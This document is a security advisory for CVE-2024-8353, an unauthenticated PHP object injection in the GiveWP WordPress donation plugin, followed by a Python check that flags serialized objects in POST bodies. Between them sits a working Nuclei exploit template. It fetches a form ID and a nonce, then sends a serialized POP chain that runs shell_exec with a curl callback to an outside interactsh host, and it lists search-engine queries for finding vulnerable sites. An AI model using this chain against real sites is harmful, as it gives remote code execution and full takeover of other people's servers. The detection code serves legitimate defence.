The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.16.1. This is due to insufficient input validation on user-supplied data. An unauthenticated attacker can inject a serialized PHP object, which may allow them to execute arbitrary PHP code, depending on the presence of a suitable POP chain on the target system. This vulnerability could lead to full site compromise.
PoC code [publicly available]
id: CVE-2024-8353

info:
  name: GiveWP Donation Plugin <= 3.16.1 - Unauthenticated PHP Object Injection
  author: hnd3884
  severity: critical
  description: |
    The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.16.1. This is due to insufficient input validation on user-supplied data. An unauthenticated attacker can inject a serialized PHP object, which may allow them to execute arbitrary PHP code, depending on the presence of a suitable POP chain on the target system. This vulnerability could lead to full site compromise.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8353
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/give/givewp-donation-plugin-and-fundraising-platform-3161-unauthenticated-php-object-injection
    - https://plugins.trac.wordpress.org/browser/give/trunk/readme.txt
    - https://plugins.trac.wordpress.org/browser/give/tags/3.16.0/includes/process-donation.php#L154
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2024-8353
    cwe-id: CWE-502
    epss-score: 0.92258
    epss-percentile: 0.99708
    cpe: cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    vendor: givewp
    product: givewp
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/give/"
    fofa-query: body="/wp-content/plugins/give/"
    publicwww-query: "/wp-content/plugins/give/"
  tags: cve,cve2024,wordpress,wp,wp-plugin,givewp,rce,unauth,vkev

variables:
  cmd: "curl+http://test.{{interactsh-url}}"
  length: "{{len(cmd)}}"
  cred: "{{rand_text_alpha(8)}}"

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=give_form_search

    extractors:
      - type: json
        name: id
        json:
          - ".[0].id"
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=give_donation_form_nonce&give_form_id={{id}}

    extractors:
      - type: json
        name: nonce
        json:
          - ".data"
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        give-form-id={{id}}&give-form-hash={{nonce}}&give-price-id=0&give-amount=10&give_first={{cred}}&give_last={{cred}}&give_email={{cred}}%40example.org&give_title=%5CO%3A19%3A%22Stripe%5C%5C%5C%5CStripeObject%22%3A1%3A%7Bs%3A10%3A%22%5C0%2A%5C0_values%22%3Ba%3A1%3A%7Bs%3A3%3A%22foo%22%3BO%3A62%3A%22Give%5C%5C%5C%5CPaymentGateways%5C%5C%5C%5CDataTransferObjects%5C%5C%5C%5CGiveInsertPaymentData%22%3A1%3A%7Bs%3A8%3A%22userInfo%22%3Ba%3A1%3A%7Bs%3A7%3A%22address%22%3BO%3A4%3A%22Give%22%3A1%3A%7Bs%3A12%3A%22%5C0%2A%5C0container%22%3BO%3A33%3A%22Give%5C%5C%5C%5CVendors%5C%5C%5C%5CFaker%5C%5C%5C%5CValidGenerator%22%3A3%3A%7Bs%3A12%3A%22%5C0%2A%5C0validator%22%3Bs%3A10%3A%22shell_exec%22%3Bs%3A12%3A%22%5C0%2A%5C0generator%22%3BO%3A34%3A%22Give%5C%5C%5C%5COnboarding%5C%5C%5C%5CSettingsRepository%22%3A1%3A%7Bs%3A11%3A%22%5C0%2A%5C0settings%22%3Ba%3A1%3A%7Bs%3A8%3A%22address1%22%3Bs%3A{{length}}%3A%22{{cmd}}%22%3B%7D%7Ds%3A13%3A%22%5C0%2A%5C0maxRetries%22%3Bi%3A10%3B%7D%7D%7D%7D%7D%7D&give-gateway=offline&action=give_process_donation

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'dns')
          - contains(content_type, "text/html")
          - status_code == 500
        condition: and
# digest: 490a0046304402207f4e096397d206ff98c5b0f42640ad4cd4fee867fb0aa768c69c0cb265dca55202203362d4800065dcd09b5272cb52b64e8812aff6f70fbb317302f6a62adc862bd5:922c64590222798bb761d5b6d8e72950
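Added here as a defender-side check, not code from the template above or from the GiveWP code base: the Python below flags any field of a donation POST body whose value carries a serialized PHP object header. Because the PoC submits the object with a leading backslash and backslash-doubled namespace separators, the check runs both on the value as received and after a PHP stripslashes() equivalent; the sample bodies are constructed, and their serialized value is a harmless stdClass rather than the chain in the template.

```python
import re
from urllib.parse import parse_qs

# Header of a serialized PHP object: O:<length>:"<class>":<property count>:{
# Namespaced classes carry backslashes, so allow them inside the class name.
PHP_OBJECT_RE = re.compile(r'O:\d+:"[A-Za-z0-9_\\]+":\d+:\{')

def php_stripslashes(s: str) -> str:
    """Mimic PHP stripslashes(): drop one level of backslashes; the
    two-character sequence \\0 becomes a NUL byte, as in PHP."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append("\x00" if s[i + 1] == "0" else s[i + 1])
            i += 2
        elif s[i] == "\\":
            i += 1  # a trailing lone backslash is dropped
        else:
            out.append(s[i])
            i += 1
    return "".join(out)

def suspicious_fields(body: str) -> list[str]:
    """Fields of a URL-encoded POST body whose value carries a serialized PHP
    object header, checked as received and after stripslashes(): backslash
    escaping hides the header from a naive check until the app strips it."""
    hits = []
    for name, values in parse_qs(body, keep_blank_values=True).items():
        if any(PHP_OBJECT_RE.search(v) or PHP_OBJECT_RE.search(php_stripslashes(v))
               for v in values):
            hits.append(name)
    return sorted(hits)

# Constructed sample bodies (not from the page): a benign submission and one
# whose give_title holds a harmless, backslash-escaped serialized stdClass.
SAMPLE_BODIES = {
    "benign": "give-form-id=1&give_first=Ann&give_last=Lee&give_title=Ms"
              "&action=give_process_donation",
    "injected": "give-form-id=1&give_first=Ann&give_title=%5CO%3A8%3A%22stdClass"
                "%22%3A1%3A%7Bs%3A3%3A%22foo%22%3Bs%3A3%3A%22bar%22%3B%7D"
                "&action=give_process_donation",
}

def scan_samples() -> dict[str, list[str]]:
    return {label: suspicious_fields(body) for label, body in SAMPLE_BODIES.items()}

if __name__ == "__main__":
    for label, fields in scan_samples().items():
        print(f"{label}: {fields or 'clean'}")
```

The same check can be run over captured request bodies from a WAF or reverse-proxy log to triage attempts against the give_process_donation action.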